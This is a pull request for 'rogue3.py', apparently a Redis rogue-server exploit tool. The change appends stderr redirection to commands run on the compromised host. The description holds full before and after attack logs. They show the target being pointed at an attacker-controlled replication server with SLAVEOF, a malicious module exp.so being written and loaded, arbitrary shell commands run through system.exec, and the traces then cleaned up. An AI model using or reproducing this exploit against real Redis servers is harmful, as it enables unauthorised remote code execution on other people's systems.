### PR TITLE
Make it possible to display stderr by redirect

### DIFF
--- a/rogue3.py
+++ b/rogue3.py
@@ -63,7 +63,7 @@ class Remote:
         return buf
 
     def shell_cmd(self, cmd):
-        self.send(mk_cmd_arr(['system.exec', f"{cmd}"]))
+        self.send(mk_cmd_arr(['system.exec', f"{cmd} 2>&1"]))
         buf = self.recv()
         return buf
 


### PR DESCRIPTION
I made it possible to display all command output by redirect.

before:

```
$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.100.8 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.100.8:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.100.8', '$5', '21000']
[->] ['+OK']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', 'c13623d2a31631fc7579101ef4416cd17b50f249', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['+OK']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] hoge
[<-] ['*2', '$11', 'system.exec', '$4', 'hoge']
[->] ['$1', 'N']
[<<] apt install -y nginx
[<-] ['*2', '$11', 'system.exec', '$20', 'apt install -y nginx']
[->] ['$1', '\x08']
[<<] 

```

after:

```
$ python3 rogue3.py --rhost 127.0.0.1 --rport 6379 --lhost 192.168.100.8 --lport 21000
TARGET 127.0.0.1:6379
SERVER 192.168.100.8:21000
[<-] ['*3', '$7', 'SLAVEOF', '$14', '192.168.100.8', '$5', '21000']
[->] ['+OK Already connected to specified master']
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$6', 'exp.so']
[->] ['+OK']
[->] ['*1', '$4', 'PING']
[<-] ['+PONG']
[->] ['*3', '$8', 'REPLCONF', '$14', 'listening-port', '$4', '6379']
[<-] ['+OK']
[->] ['*5', '$8', 'REPLCONF', '$4', 'capa', '$3', 'eof', '$4', 'capa', '$6', 'psync2']
[<-] ['+OK']
[->] ['*3', '$5', 'PSYNC', '$40', 'de54eeed2a3a0c7445f64a631c472f25fa81634a', '$1', '1']
[<-] ['*3', '$6', 'MODULE', '$4', 'LOAD', '$8', './exp.so']
[->] ['+OK']
[<-] ['*3', '$7', 'SLAVEOF', '$2', 'NO', '$3', 'ONE']
[->] ['+OK']
[<<] hoge
[<-] ['*2', '$11', 'system.exec', '$9', 'hoge 2>&1']
[->] ['$24', 'Nsh: 1: hoge: not found']
[<<] apt install -y nginx
[<-] ['*2', '$11', 'system.exec', '$25', 'apt install -y nginx 2>&1']
[->] ['$259', '\x08\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\n\nE: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)\nE: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?']
[<<] exit
[<-] ['*4', '$6', 'CONFIG', '$3', 'SET', '$10', 'dbfilename', '$8', 'dump.rdb']
[->] ['+OK']
[<-] ['*2', '$11', 'system.exec', '$16', 'rm ./exp.so 2>&1']
[->] ['$0']
[<-] ['*3', '$6', 'MODULE', '$6', 'UNLOAD', '$6', 'system']
[->] ['+OK']
```